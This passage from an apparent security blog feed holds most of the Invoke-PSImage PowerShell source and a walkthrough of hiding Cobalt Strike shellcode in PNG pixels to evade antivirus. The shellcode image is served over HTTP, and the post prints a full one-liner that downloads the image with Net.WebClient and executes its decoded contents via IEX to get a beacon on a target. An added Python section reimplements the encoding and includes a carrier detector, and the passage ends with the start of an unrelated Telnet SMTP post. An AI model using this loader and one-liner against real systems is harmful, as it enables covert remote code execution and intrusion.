class="type">Mandatory</span> = <span class="variable">$True</span>)]</span><br><span class="line"> [<span class="built_in">String</span>]</span><br><span class="line"> <span class="variable">$Script</span>,</span><br><span class="line"> </span><br><span class="line"> [<span class="type">Parameter</span>(<span class="type">Position</span> = <span class="number">1</span>, <span class="type">Mandatory</span> = <span class="variable">$True</span>)]</span><br><span class="line"> [<span class="built_in">String</span>]</span><br><span class="line"> <span class="variable">$Out</span>,</span><br><span class="line"> </span><br><span class="line"> [<span class="type">Parameter</span>(<span class="type">Position</span> = <span class="number">2</span>, <span class="type">Mandatory</span> = <span class="variable">$False</span>)]</span><br><span class="line"> [<span class="built_in">String</span>]</span><br><span class="line"> <span class="variable">$Image</span>,</span><br><span class="line"></span><br><span class="line"> [<span class="type">switch</span>] <span class="variable">$WebClient</span>,</span><br><span class="line"> </span><br><span class="line"> [<span class="type">switch</span>] <span class="variable">$PictureBox</span></span><br><span class="line"> )</span><br><span class="line"> <span class="comment"># Stop if we hit an error instead of making more errors</span></span><br><span class="line"> <span class="variable">$ErrorActionPreference</span> = <span class="string">"Stop"</span></span><br><span class="line"></span><br><span class="line"> <span class="comment"># Load some assemblies</span></span><br><span class="line"> [<span class="built_in">void</span>] [<span class="type">System.Reflection.Assembly</span>]::LoadWithPartialName(<span class="string">"System.Drawing"</span>)</span><br><span class="line"> [<span class="built_in">void</span>] [<span class="type">System.Reflection.Assembly</span>]::LoadWithPartialName(<span 
class="string">"System.Web"</span>)</span><br><span class="line"> </span><br><span class="line"> <span class="comment"># Normalize paths because powershell is sometimes bad with them.</span></span><br><span class="line"> <span class="keyword">if</span> (<span class="operator">-Not</span> [<span class="type">System.IO.Path</span>]::IsPathRooted(<span class="variable">$Script</span>)){</span><br><span class="line"> <span class="variable">$Script</span> = [<span class="type">System.IO.Path</span>]::GetFullPath((<span class="built_in">Join-Path</span> (<span class="built_in">Get-Location</span>) <span class="variable">$Script</span>))</span><br><span class="line"> }</span><br><span class="line"> <span class="keyword">if</span> (<span class="operator">-Not</span> [<span class="type">System.IO.Path</span>]::IsPathRooted(<span class="variable">$Out</span>)){</span><br><span class="line"> <span class="variable">$Out</span> = [<span class="type">System.IO.Path</span>]::GetFullPath((<span class="built_in">Join-Path</span> (<span class="built_in">Get-Location</span>) <span class="variable">$Out</span>))</span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> <span class="variable">$testurl</span> = <span class="string">"http://example.com/"</span> + [<span class="type">System.IO.Path</span>]::GetFileName(<span class="variable">$Out</span>)</span><br><span class="line"></span><br><span class="line"> <span class="comment"># Read in the script (ASCII only: both this encoder and the generated one-liner use the ASCII encoding)</span></span><br><span class="line"> <span class="variable">$ScriptBlockString</span> = [<span class="type">IO.File</span>]::ReadAllText(<span class="variable">$Script</span>)</span><br><span class="line"> <span class="variable">$in</span> = [<span class="type">ScriptBlock</span>]::Create(<span class="variable">$ScriptBlockString</span>)</span><br><span class="line"> <span class="variable">$payload</span> = [<span class="type">system.Text.Encoding</span>]::ASCII.GetBytes(<span 
class="variable">$in</span>)</span><br><span class="line"></span><br><span class="line"> <span class="keyword">if</span> (<span class="variable">$Image</span>) {</span><br><span class="line"> <span class="comment"># Normalize paths because powershell is sometimes bad with them.</span></span><br><span class="line"> <span class="keyword">if</span> (<span class="operator">-Not</span> [<span class="type">System.IO.Path</span>]::IsPathRooted(<span class="variable">$Image</span>)){</span><br><span class="line"> <span class="variable">$Image</span> = [<span class="type">System.IO.Path</span>]::GetFullPath((<span class="built_in">Join-Path</span> (<span class="built_in">Get-Location</span>) <span class="variable">$Image</span>))</span><br><span class="line"> }</span><br><span class="line"> </span><br><span class="line"> <span class="comment"># Read the image into a bitmap. The nibble loop below indexes pixels as 3 bytes each with no row padding,</span></span><br><span class="line"> <span class="comment"># so it assumes a 24bpp source (a JPEG loads as 24bpp) whose width is a multiple of 4.</span></span><br><span class="line"> <span class="variable">$img</span> = <span class="built_in">New-Object</span> System.Drawing.Bitmap(<span class="variable">$Image</span>)</span><br><span class="line"></span><br><span class="line"> <span class="variable">$width</span> = <span class="variable">$img</span>.Size.Width</span><br><span class="line"> <span class="variable">$height</span> = <span class="variable">$img</span>.Size.Height</span><br><span class="line"></span><br><span class="line"> <span class="comment"># Lock the bitmap in memory so it can be changed programmatically.</span></span><br><span class="line"> <span class="variable">$rect</span> = <span class="built_in">New-Object</span> System.Drawing.Rectangle(<span class="number">0</span>, <span class="number">0</span>, <span class="variable">$width</span>, <span class="variable">$height</span>);</span><br><span class="line"> <span class="variable">$bmpData</span> = <span class="variable">$img</span>.LockBits(<span class="variable">$rect</span>, [<span class="type">System.Drawing.Imaging.ImageLockMode</span>]::ReadWrite, <span 
class="variable">$img</span>.PixelFormat)</span><br><span class="line"> <span class="variable">$ptr</span> = <span class="variable">$bmpData</span>.Scan0</span><br><span class="line"></span><br><span class="line"> <span class="comment"># Copy the RGB values to an array for easy modification</span></span><br><span class="line"> <span class="variable">$bytes</span> = [<span class="type">Math</span>]::Abs(<span class="variable">$bmpData</span>.Stride) * <span class="variable">$img</span>.Height</span><br><span class="line"> <span class="variable">$rgbValues</span> = <span class="built_in">New-Object</span> byte[] <span class="variable">$bytes</span>;</span><br><span class="line"> [<span class="type">System.Runtime.InteropServices.Marshal</span>]::Copy(<span class="variable">$ptr</span>, <span class="variable">$rgbValues</span>, <span class="number">0</span>, <span class="variable">$bytes</span>);</span><br><span class="line"></span><br><span class="line"> <span class="comment"># Check that the payload fits in the image: the loop below stores one payload byte per 3-byte pixel, so the</span></span><br><span class="line"> <span class="comment"># capacity is $bytes/3. Testing against $bytes/2 would let an oversized payload through silently and the</span></span><br><span class="line"> <span class="comment"># generated one-liner would then read past the last row.</span></span><br><span class="line"> <span class="keyword">if</span>(<span class="variable">$bytes</span>/<span class="number">3</span> <span class="operator">-lt</span> <span class="variable">$payload</span>.Length) {</span><br><span class="line"> <span class="built_in">Write-Error</span> <span class="string">"Image not large enough to contain payload!"</span></span><br><span class="line"> <span class="variable">$img</span>.UnlockBits(<span class="variable">$bmpData</span>)</span><br><span class="line"> <span class="variable">$img</span>.Dispose()</span><br><span class="line"> <span class="keyword">Break</span></span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> <span class="comment"># Generate a random string to use to fill other pixel info in the picture.</span></span><br><span class="line"> <span class="comment"># (Calling get-random every time is too slow)</span></span><br><span class="line"> <span 
class="variable">$randstr</span> = [<span class="type">System.Web.Security.Membership</span>]::GeneratePassword(<span class="number">128</span>,<span class="number">0</span>)</span><br><span class="line"> <span class="variable">$randb</span> = [<span class="type">system.Text.Encoding</span>]::ASCII.GetBytes(<span class="variable">$randstr</span>)</span><br><span class="line"> </span><br><span class="line"> <span class="comment"># loop through the RGB array and copy the payload into it</span></span><br><span class="line"> <span class="keyword">for</span> (<span class="variable">$counter</span> = <span class="number">0</span>; <span class="variable">$counter</span> <span class="operator">-lt</span> (<span class="variable">$rgbValues</span>.Length)/<span class="number">3</span>; <span class="variable">$counter</span>++) {</span><br><span class="line"> <span class="keyword">if</span> (<span class="variable">$counter</span> <span class="operator">-lt</span> <span class="variable">$payload</span>.Length){</span><br><span class="line"> <span class="variable">$paybyte1</span> = [<span class="type">math</span>]::Floor(<span class="variable">$payload</span>[<span class="variable">$counter</span>]/<span class="number">16</span>)</span><br><span class="line"> <span class="variable">$paybyte2</span> = (<span class="variable">$payload</span>[<span class="variable">$counter</span>] <span class="operator">-band</span> <span class="number">0</span>x0f)</span><br><span class="line"> <span class="variable">$paybyte3</span> = (<span class="variable">$randb</span>[(<span class="variable">$counter</span>+<span class="number">2</span>)%<span class="number">109</span>] <span class="operator">-band</span> <span class="number">0</span>x0f)</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> <span class="variable">$paybyte1</span> = (<span class="variable">$randb</span>[<span class="variable">$counter</span>%<span class="number">113</span>] <span 
class="operator">-band</span> <span class="number">0</span>x0f)</span><br><span class="line"> <span class="variable">$paybyte2</span> = (<span class="variable">$randb</span>[(<span class="variable">$counter</span>+<span class="number">1</span>)%<span class="number">67</span>] <span class="operator">-band</span> <span class="number">0</span>x0f)</span><br><span class="line"> <span class="variable">$paybyte3</span> = (<span class="variable">$randb</span>[(<span class="variable">$counter</span>+<span class="number">2</span>)%<span class="number">109</span>] <span class="operator">-band</span> <span class="number">0</span>x0f)</span><br><span class="line"> }</span><br><span class="line"> <span class="variable">$rgbValues</span>[(<span class="variable">$counter</span>*<span class="number">3</span>)] = (<span class="variable">$rgbValues</span>[(<span class="variable">$counter</span>*<span class="number">3</span>)] <span class="operator">-band</span> <span class="number">0</span>xf0) <span class="operator">-bor</span> <span class="variable">$paybyte1</span></span><br><span class="line"> <span class="variable">$rgbValues</span>[(<span class="variable">$counter</span>*<span class="number">3</span>+<span class="number">1</span>)] = (<span class="variable">$rgbValues</span>[(<span class="variable">$counter</span>*<span class="number">3</span>+<span class="number">1</span>)] <span class="operator">-band</span> <span class="number">0</span>xf0) <span class="operator">-bor</span> <span class="variable">$paybyte2</span></span><br><span class="line"> <span class="variable">$rgbValues</span>[(<span class="variable">$counter</span>*<span class="number">3</span>+<span class="number">2</span>)] = (<span class="variable">$rgbValues</span>[(<span class="variable">$counter</span>*<span class="number">3</span>+<span class="number">2</span>)] <span class="operator">-band</span> <span class="number">0</span>xf0) <span class="operator">-bor</span> <span 
class="variable">$paybyte3</span></span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> <span class="comment"># Copy the array of RGB values back to the bitmap</span></span><br><span class="line"> [<span class="type">System.Runtime.InteropServices.Marshal</span>]::Copy(<span class="variable">$rgbValues</span>, <span class="number">0</span>, <span class="variable">$ptr</span>, <span class="variable">$bytes</span>)</span><br><span class="line"> <span class="variable">$img</span>.UnlockBits(<span class="variable">$bmpData</span>)</span><br><span class="line"></span><br><span class="line"> <span class="comment"># Write the image to a file</span></span><br><span class="line"> <span class="variable">$img</span>.Save(<span class="variable">$Out</span>, [<span class="type">System.Drawing.Imaging.ImageFormat</span>]::Png)</span><br><span class="line"> <span class="variable">$img</span>.Dispose()</span><br><span class="line"> </span><br><span class="line"> <span class="comment"># Get a bunch of numbers we need to use in the oneliner</span></span><br><span class="line"> <span class="variable">$rows</span> = [<span class="type">math</span>]::Ceiling(<span class="variable">$payload</span>.Length/<span class="variable">$width</span>)</span><br><span class="line"> <span class="variable">$array</span> = (<span class="variable">$rows</span>*<span class="variable">$width</span>)</span><br><span class="line"> <span class="variable">$lrows</span> = (<span class="variable">$rows</span><span class="literal">-1</span>)</span><br><span class="line"> <span class="variable">$lwidth</span> = (<span class="variable">$width</span><span class="literal">-1</span>)</span><br><span class="line"> <span class="variable">$lpayload</span> = (<span class="variable">$payload</span>.Length<span class="literal">-1</span>)</span><br><span class="line"></span><br><span class="line"> <span class="keyword">if</span>(<span class="variable">$WebClient</span>) 
{</span><br><span class="line"> <span class="variable">$pscmd</span> = <span class="string">"sal a New-Object;Add-Type -A System.Drawing;`$g=a System.Drawing.Bitmap((a Net.WebClient).OpenRead(`"<span class="variable">$testurl</span>`"));`$o=a Byte[] <span class="variable">$array</span>;(0..<span class="variable">$lrows</span>)|%{foreach(`$x in(0..<span class="variable">$lwidth</span>)){`$p=`$g.GetPixel(`$x,`$_);`$o[`$_*<span class="variable">$width</span>+`$x]=([math]::Floor((`$p.B-band15)*16)-bor(`$p.G -band 15))}};IEX([System.Text.Encoding]::ASCII.GetString(`$o[0..<span class="variable">$lpayload</span>]))"</span></span><br><span class="line"> } <span class="keyword">elseif</span>(<span class="variable">$PictureBox</span>) {</span><br><span class="line"> <span class="variable">$pscmd</span> = <span class="string">"sal a New-Object;Add-Type -A System.Windows.Forms;(`$d=a System.Windows.Forms.PictureBox).Load(`"<span class="variable">$testurl</span>`");`$g=`$d.Image;`$o=a Byte[] <span class="variable">$array</span>;(0..<span class="variable">$lrows</span>)|%{foreach(`$x in(0..<span class="variable">$lwidth</span>)){`$p=`$g.GetPixel(`$x,`$_);`$o[`$_*<span class="variable">$width</span>+`$x]=([math]::Floor((`$p.B-band15)*16)-bor(`$p.G -band 15))}};IEX([System.Text.Encoding]::ASCII.GetString(`$o[0..<span class="variable">$lpayload</span>]))"</span></span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> <span class="variable">$pscmd</span> = <span class="string">"sal a New-Object;Add-Type -A System.Drawing;`$g=a System.Drawing.Bitmap(`"<span class="variable">$Out</span>`");`$o=a Byte[] <span class="variable">$array</span>;(0..<span class="variable">$lrows</span>)|%{foreach(`$x in(0..<span class="variable">$lwidth</span>)){`$p=`$g.GetPixel(`$x,`$_);`$o[`$_*<span class="variable">$width</span>+`$x]=([math]::Floor((`$p.B-band15)*16)-bor(`$p.G-band15))}};`$g.Dispose();IEX([System.Text.Encoding]::ASCII.GetString(`$o[0..<span 
class="variable">$lpayload</span>]))"</span></span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> <span class="keyword">return</span> <span class="variable">$pscmd</span></span><br><span class="line"></span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> <span class="comment"># Decide how large our image needs to be (always square for easy math; the side is rounded up to a multiple of 4 so the 24bpp row stride has no padding)</span></span><br><span class="line"> <span class="variable">$side</span> = ([<span class="built_in">int</span>] ([<span class="type">math</span>]::ceiling([<span class="type">math</span>]::Sqrt([<span class="type">math</span>]::ceiling(<span class="variable">$payload</span>.Length / <span class="number">3</span>)) + <span class="number">3</span>) / <span class="number">4</span>)) * <span class="number">4</span></span><br><span class="line"></span><br><span class="line"> <span class="comment"># Allocate the pixel buffer (3 bytes per pixel); in this mode the payload is stored as raw bytes, not as nibbles</span></span><br><span class="line"> <span class="variable">$rgbValues</span> = <span class="built_in">New-Object</span> byte[] (<span class="variable">$side</span> * <span class="variable">$side</span> * <span class="number">3</span>);</span><br><span class="line"> <span class="variable">$randstr</span> = [<span class="type">System.Web.Security.Membership</span>]::GeneratePassword(<span class="number">128</span>,<span class="number">0</span>)</span><br><span class="line"> <span class="variable">$randb</span> = [<span class="type">system.Text.Encoding</span>]::ASCII.GetBytes(<span class="variable">$randstr</span>)</span><br><span class="line"></span><br><span class="line"> <span class="comment"># loop through the RGB array and copy the payload into it</span></span><br><span class="line"> <span class="keyword">for</span> (<span class="variable">$counter</span> = <span class="number">0</span>; <span class="variable">$counter</span> <span class="operator">-lt</span> (<span 
class="variable">$rgbValues</span>.Length); <span class="variable">$counter</span>++) {</span><br><span class="line"> <span class="keyword">if</span> (<span class="variable">$counter</span> <span class="operator">-lt</span> <span class="variable">$payload</span>.Length){</span><br><span class="line"> <span class="variable">$rgbValues</span>[<span class="variable">$counter</span>] = <span class="variable">$payload</span>[<span class="variable">$counter</span>]</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> <span class="variable">$rgbValues</span>[<span class="variable">$counter</span>] = <span class="variable">$randb</span>[<span class="variable">$counter</span>%<span class="number">113</span>]</span><br><span class="line"> }</span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> <span class="comment"># Copy the array of RGB values back to the bitmap</span></span><br><span class="line"> <span class="variable">$ptr</span> = [<span class="type">System.Runtime.InteropServices.Marshal</span>]::AllocHGlobal(<span class="variable">$rgbValues</span>.Length)</span><br><span class="line"> [<span class="type">System.Runtime.InteropServices.Marshal</span>]::Copy(<span class="variable">$rgbValues</span>, <span class="number">0</span>, <span class="variable">$ptr</span>, <span class="variable">$rgbValues</span>.Length)</span><br><span class="line"> <span class="variable">$img</span> = <span class="built_in">New-Object</span> System.Drawing.Bitmap(<span class="variable">$side</span>, <span class="variable">$side</span>, (<span class="variable">$side</span>*<span class="number">3</span>), [<span class="type">System.Drawing.Imaging.PixelFormat</span>]::Format24bppRgb, <span class="variable">$ptr</span>)</span><br><span class="line"></span><br><span class="line"> <span class="comment"># Write the image to a file</span></span><br><span class="line"> <span class="variable">$img</span>.Save(<span 
class="variable">$Out</span>, [<span class="type">System.Drawing.Imaging.ImageFormat</span>]::Png)</span><br><span class="line"> <span class="variable">$img</span>.Dispose()</span><br><span class="line"> [<span class="type">System.Runtime.InteropServices.Marshal</span>]::FreeHGlobal(<span class="variable">$ptr</span>);</span><br><span class="line"> </span><br><span class="line"> <span class="comment"># Get a bunch of numbers we need to use in the oneliner</span></span><br><span class="line"> <span class="variable">$array</span> = (<span class="variable">$side</span>*<span class="variable">$side</span>)*<span class="number">3</span></span><br><span class="line"> <span class="variable">$lrows</span> = (<span class="variable">$side</span><span class="literal">-1</span>)</span><br><span class="line"> <span class="variable">$lwidth</span> = (<span class="variable">$side</span><span class="literal">-1</span>)</span><br><span class="line"> <span class="variable">$width</span> = (<span class="variable">$side</span>)</span><br><span class="line"> <span class="variable">$lpayload</span> = (<span class="variable">$payload</span>.Length<span class="literal">-1</span>)</span><br><span class="line"></span><br><span class="line"> <span class="keyword">if</span>(<span class="variable">$WebClient</span>) {</span><br><span class="line"> <span class="variable">$pscmd</span> = <span class="string">"sal a New-Object;Add-Type -A System.Drawing;`$g=a System.Drawing.Bitmap((a Net.WebClient).OpenRead(`"<span class="variable">$testurl</span>`"));`$o=a Byte[] <span class="variable">$array</span>;(0..<span class="variable">$lrows</span>)|%{foreach(`$x in(0..<span class="variable">$lwidth</span>)){`$p=`$g.GetPixel(`$x,`$_);`$o[(`$_*<span class="variable">$width</span>+`$x)*3]=`$p.B;`$o[(`$_*<span class="variable">$width</span>+`$x)*3+1]=`$p.G;`$o[(`$_*<span class="variable">$width</span>+`$x)*3+2]=`$p.R}};IEX([System.Text.Encoding]::ASCII.GetString(`$o[0..<span 
class="variable">$lpayload</span>]))"</span></span><br><span class="line"> } <span class="keyword">elseif</span>(<span class="variable">$PictureBox</span>) {</span><br><span class="line"> <span class="variable">$pscmd</span> = <span class="string">"sal a New-Object;Add-Type -A System.Windows.Forms;(`$d=a System.Windows.Forms.PictureBox).Load(`"<span class="variable">$testurl</span>`");`$g=`$d.Image;`$o=a Byte[] <span class="variable">$array</span>;(0..<span class="variable">$lrows</span>)|%{foreach(`$x in(0..<span class="variable">$lwidth</span>)){`$p=`$g.GetPixel(`$x,`$_);`$o[(`$_*<span class="variable">$width</span>+`$x)*3]=`$p.B;`$o[(`$_*<span class="variable">$width</span>+`$x)*3+1]=`$p.G;`$o[(`$_*<span class="variable">$width</span>+`$x)*3+2]=`$p.R}};IEX([System.Text.Encoding]::ASCII.GetString(`$o[0..<span class="variable">$lpayload</span>]))"</span></span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> <span class="variable">$pscmd</span> = <span class="string">"sal a New-Object;Add-Type -A System.Drawing;`$g=a System.Drawing.Bitmap(`"<span class="variable">$Out</span>`");`$o=a Byte[] <span class="variable">$array</span>;(0..<span class="variable">$lrows</span>)|%{foreach(`$x in(0..<span class="variable">$lwidth</span>)){`$p=`$g.GetPixel(`$x,`$_);`$o[(`$_*<span class="variable">$width</span>+`$x)*3]=`$p.B;`$o[(`$_*<span class="variable">$width</span>+`$x)*3+1]=`$p.G;`$o[(`$_*<span class="variable">$width</span>+`$x)*3+2]=`$p.R}};`$g.Dispose();IEX([System.Text.Encoding]::ASCII.GetString(`$o[0..<span class="variable">$lpayload</span>]))"</span></span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> <span class="keyword">return</span> <span class="variable">$pscmd</span></span><br><span class="line"> }</span><br><span class="line">}</span><br></pre></td></tr></table></figure>
<h5 id="CS生成Shellcode"><a href="#CS生成Shellcode" class="headerlink" title="CS生成Shellcode"></a>Generate the shellcode in Cobalt Strike</h5><p>Attacks >> Packages >> Payload Generator produces the shellcode; pick the PowerShell output type so the result is a .ps1 (the payload.ps1 that is embedded in the next step).</p>
<p><img src="/img/Shellcode%20%E9%9A%90%E5%86%99%E5%83%8F%E7%B4%A0RGB%E5%85%8D%E6%9D%80%E4%B8%8A%E7%BA%BF%E5%88%B0%20CobaltStrike/image-20210416092120420.png" alt="image-20210416092120420"></p>
<h5 id="生成Shellcode图片"><a href="#生成Shellcode图片" class="headerlink" title="生成Shellcode图片"></a>Generate the shellcode image</h5><figure class="highlight powershell"><table><tr><td class="code"><pre><span class="line"><span class="comment"># 1. Allow script execution for the current user only (Get-ExecutionPolicy -List shows the policies in effect; powershell.exe -ExecutionPolicy Bypass does the same for a single process)</span></span><br><span class="line"><span class="built_in">Set-ExecutionPolicy</span> Unrestricted <span class="literal">-Scope</span> CurrentUser</span><br><span class="line"><span class="comment"># 2. Import the downloaded Invoke-PSImage.ps1 module</span></span><br><span class="line"><span class="built_in">Import-Module</span> .\<span class="built_in">Invoke-PSimage</span>.ps1</span><br><span class="line"><span class="comment"># 3. Embed the shellcode script in the image (-Web is accepted because PowerShell resolves any unambiguous prefix of the tool's -WebClient switch)</span></span><br><span class="line"><span class="built_in">Invoke-PSImage</span> <span class="literal">-Script</span> .\payload.ps1 <span class="literal">-Image</span> .\<span class="number">2021</span>.jpg <span class="literal">-Out</span> .\<span class="number">2021</span>.png <span class="literal">-Web</span></span><br><span class="line"><span class="comment"># Parameters</span></span><br><span class="line"><span class="literal">-Script</span> [<span class="type">filepath</span>] path of the script to embed in the image</span><br><span class="line"><span class="literal">-Out</span> [<span class="type">filepath</span>] file to save the resulting image to (always a PNG: the payload lives in the pixel values, so the format must be lossless)</span><br><span class="line"><span class="literal">-Image</span> [<span class="type">filepath</span>] carrier image to embed the script in; the tool's pixel loop assumes a 24bpp carrier whose width is a multiple of 4 and stores one payload byte per pixel, so the script can be at most width*height bytes long</span><br><span class="line"><span class="literal">-Web</span> output a command that reads the image from the web with Net.WebClient</span><br></pre></td></tr></table></figure>
<p><img src="/img/Shellcode%20%E9%9A%90%E5%86%99%E5%83%8F%E7%B4%A0RGB%E5%85%8D%E6%9D%80%E4%B8%8A%E7%BA%BF%E5%88%B0%20CobaltStrike/image-20210415202230131.png" alt="image-20210415202230131"></p>
<h5 id="HTTP服务"><a href="#HTTP服务" class="headerlink" title="HTTP服务"></a>HTTP server</h5><p>Host the generated image on an HTTP server; here a python3 HTTP server is started to serve it.</p>
<p><img src="/img/Shellcode%20%E9%9A%90%E5%86%99%E5%83%8F%E7%B4%A0RGB%E5%85%8D%E6%9D%80%E4%B8%8A%E7%BA%BF%E5%88%B0%20CobaltStrike/image-20210415202655248.png" alt="image-20210415202655248"></p>
<h5 id="效果"><a href="#效果" class="headerlink" title="效果"></a>Result</h5><p>Run the generated command in PowerShell on the target machine and the beacon checks in to Cobalt Strike.</p>
<figure class="highlight powershell"><table><tr><td class="code"><pre><span class="line"><span class="comment"># replace http://example.com/2021.png with the URL where your image is hosted</span></span><br><span class="line"><span class="comment"># the baked-in numbers come from the carrier: width 176 px and a 3599-byte payload give ceil(3599/176) = 21 rows (0..20), a 21*176 = 3696-byte buffer, and bytes 0..3598 decoded</span></span><br><span class="line">sal a <span class="built_in">New-Object</span>;<span class="built_in">Add-Type</span> <span class="literal">-A</span> System.Drawing;<span class="variable">$g</span>=a System.Drawing.Bitmap((a Net.WebClient).OpenRead(<span class="string">"http://example.com/2021.png"</span>));<span class="variable">$o</span>=a Byte[] <span class="number">3696</span>;(<span class="number">0</span>..<span class="number">20</span>)|%{<span class="keyword">foreach</span>(<span class="variable">$x</span> <span class="keyword">in</span>(<span class="number">0</span>..<span class="number">175</span>)){<span class="variable">$p</span>=<span class="variable">$g</span>.GetPixel(<span class="variable">$x</span>,<span class="variable">$_</span>);<span class="variable">$o</span>[<span class="variable">$_</span>*<span class="number">176</span>+<span class="variable">$x</span>]=([<span class="type">math</span>]::Floor((<span class="variable">$p</span>.B<span class="literal">-band15</span>)*<span class="number">16</span>)<span class="operator">-bor</span>(<span class="variable">$p</span>.G <span class="operator">-band</span> <span class="number">15</span>))}};IEX([<span class="type">System.Text.Encoding</span>]::ASCII.GetString(<span class="variable">$o</span>[<span class="number">0</span><span class="type">..3598</span>]))</span><br></pre></td></tr></table></figure>
<p><img src="/img/Shellcode%20%E9%9A%90%E5%86%99%E5%83%8F%E7%B4%A0RGB%E5%85%8D%E6%9D%80%E4%B8%8A%E7%BA%BF%E5%88%B0%20CobaltStrike/image-20210415201441673.png" alt="image-20210415201441673"></p>
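<p>The technique the post relies on, as an added example that is neither Invoke-PSImage's code nor the post's own: the nibble-in-pixel encoding described in the tool's docstring and the decoding its one-liner performs, reimplemented in Python (rather than PowerShell) so it runs on any OS and the arithmetic can be checked. It also shows the capacity rule, the numbers the tool bakes into the one-liner (checked against the 3599-byte payload and 176-pixel width above), and a simple detector built on the fact that a carrier decodes to printable script text from the first pixel. The sample script, the random carrier and the carrier.png file name are constructed for the demo; the detector covers only the -Image mode, since the tool's other mode stores raw bytes instead of nibbles.</p>

```python
# Added example (not Invoke-PSImage's code, not from the post): the tool's
# pixel encoding on a flat R,G,B buffer. Payload byte -> high nibble into the
# low 4 bits of blue, low nibble into the low 4 bits of green, one byte per
# pixel in row-major order; red and the unused pixels get random low nibbles.
# GDI+ keeps pixels as B,G,R in memory, but the channel roles are identical.
# The sample script, carrier and output file name are constructed for the demo.
import os
import random
import struct
import zlib


def embed(payload: bytes, pixels: bytes) -> bytearray:
    """Write payload nibbles into the carrier; capacity is one byte per pixel."""
    n_pixels = len(pixels) // 3
    if len(payload) > n_pixels:
        raise ValueError("image not large enough to contain payload")
    out = bytearray(pixels)
    noise = os.urandom(n_pixels * 3)          # random low nibbles for the slack
    for i in range(n_pixels):
        r, g, b = 3 * i, 3 * i + 1, 3 * i + 2
        if i < len(payload):
            hi, lo = payload[i] >> 4, payload[i] & 0x0F
        else:
            hi, lo = noise[b] & 0x0F, noise[g] & 0x0F
        out[b] = (out[b] & 0xF0) | hi
        out[g] = (out[g] & 0xF0) | lo
        out[r] = (out[r] & 0xF0) | (noise[r] & 0x0F)
    return out


def extract(pixels: bytes, length: int) -> bytes:
    """The one-liner's ((B -band 15)*16) -bor (G -band 15), pixel by pixel."""
    return bytes(((pixels[3 * i + 2] & 0x0F) << 4) | (pixels[3 * i + 1] & 0x0F)
                 for i in range(length))


def oneliner_params(payload_len: int, width: int):
    """The numbers the tool bakes into its one-liner: Byte[] size, last row
    index, last column index, last payload index."""
    rows = -(-payload_len // width)           # ceil(payload_len / width)
    return rows * width, rows - 1, width - 1, payload_len - 1


def looks_like_psimage(pixels: bytes, probe: int = 64) -> bool:
    """Crude detector for the -Image mode: a carrier decodes to printable
    script text from pixel 0, a normal photo to near-uniform bytes (about 38%
    printable). The distinct-byte floor rejects flat single-colour images."""
    sample = extract(pixels, min(probe, len(pixels) // 3))
    if not sample:
        return False
    printable = sum(32 <= c < 127 or c in (9, 10, 13) for c in sample)
    return printable / len(sample) > 0.95 and len(set(sample)) >= 8


def to_png(width: int, height: int, pixels: bytes) -> bytes:
    """Minimal 8-bit RGB PNG (filter type 0 on every scanline): lossless, as
    the tool requires, and loadable by System.Drawing.Bitmap."""
    def chunk(tag: bytes, data: bytes) -> bytes:
        return (struct.pack(">I", len(data)) + tag + data
                + struct.pack(">I", zlib.crc32(tag + data)))
    stride = width * 3
    raw = b"".join(b"\x00" + bytes(pixels[y * stride:(y + 1) * stride])
                   for y in range(height))
    return (b"\x89PNG\r\n\x1a\n"
            + chunk(b"IHDR", struct.pack(">IIBBBBB", width, height, 8, 2, 0, 0, 0))
            + chunk(b"IDAT", zlib.compress(raw))
            + chunk(b"IEND", b""))


if __name__ == "__main__":
    script = b"Write-Host 'hello from a pixel'\n" * 3   # constructed stand-in for payload.ps1
    w, h = 16, 8                                        # 128 pixels for 96 payload bytes
    rng = random.Random(2021)
    photo = bytes(rng.getrandbits(8) for _ in range(w * h * 3))  # constructed carrier
    carrier = embed(script, photo)
    assert extract(carrier, len(script)) == script
    print("carrier flagged:", looks_like_psimage(carrier), "photo flagged:", looks_like_psimage(photo))
    print("one-liner numbers for the post's 3599-byte payload at width 176:", oneliner_params(3599, 176))
    with open("carrier.png", "wb") as f:                # constructed output name
        f.write(to_png(w, h, carrier))
```

Running it writes carrier.png, which the tool's generated one-liner would read with System.Drawing.Bitmap in exactly the same way. On the defensive side the printable-ratio check is cheap enough to run over any PNG that powershell.exe fetches, although the stronger signal is the behaviour itself: a PowerShell process opening an image over HTTP and feeding its pixel values to IEX.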
<h4 id="参考"><a href="#参考" class="headerlink" title="参考"></a>References</h4><p><a href="https://github.com/dayuxiyou/Invoke-PSImage" target="_blank" rel="noopener">https://github.com/dayuxiyou/Invoke-PSImage</a></p>
<p><a href="https://www.freebuf.com/articles/web/262978.html" target="_blank" rel="noopener">https://www.freebuf.com/articles/web/262978.html</a></p>
]]></content>
</entry>
<entry>
<title>Testing mail protocols with Telnet</title>
<url>/2021/04/14/Telnet%20SMTP/</url>
<content><![CDATA[<p>This article is for technical research and discussion only; any use for illegal purposes is strictly prohibited, and all consequences of such use are the reader's own responsibility.</p>
<div style="text-align: right"> 小维</div>
<h5 id="smtp"><a href="#smtp" class="headerlink" title="smtp"></a>SMTP</h5><p><img src="/img/Telnet%20SMTP/image-20210414093817371.png" alt="image-20210414093817371"></p>
<a id="more"></a>
